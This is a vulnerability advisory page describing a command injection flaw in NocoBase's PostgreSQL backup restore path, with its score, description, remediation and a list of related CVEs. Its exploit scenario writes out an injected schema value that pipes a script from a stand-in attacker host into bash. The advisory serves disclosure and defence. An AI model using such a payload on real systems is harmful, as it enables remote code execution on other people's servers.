Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H
RCE as server process yields full confidentiality loss (C:H not C:L); all other metrics align with the description and PR:H requirement.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to 2.1.19, NocoBase @nocobase/plugin-backups restored PostgreSQL backups by interpolating the database.schema value from _metadata.json into shell command strings executed with Node.js child_process.exec(), allowing a backup-management user restoring a crafted backup to execute commands as the NocoBase server process. This vulnerability is fixed in 2.1.19.
AnalysisAI
Command injection in NocoBase's @nocobase/plugin-backups prior to v2.1.19 allows an authenticated backup-management user to execute arbitrary OS commands as the NocoBase server process by restoring a crafted backup archive. The database.schema field from a backup's _metadata.json is interpolated directly into a shell command string passed to Node.js child_process.exec(), a classic CWE-78 pattern that bypasses any sanitization at the shell level. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The @nocobase/plugin-backups plugin must be installed and enabled, and the NocoBase instance must use a PostgreSQL backend - the injection occurs specifically in the PostgreSQL backup restore code path and does not affect other database types. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | CVSS 3.1 scores this at 6.7 (Medium) with vector AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who holds (or has compromised) a NocoBase backup management account crafts a backup archive whose _metadata.json contains a malicious database.schema value such as public; curl http://attacker.example/shell.sh | bash #. The attacker uploads the archive and initiates a restore operation via the NocoBase UI. … |
| Remediation | Upgrade to NocoBase v2.1.19 or later, which resolves this vulnerability by replacing child_process.exec() with child_process.spawn() (discrete argument array form) in the backup plugin's PostgreSQL restore path, confirmed by commit 0e1aba1b7b112ffc841588963f7343c00edd9806. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44804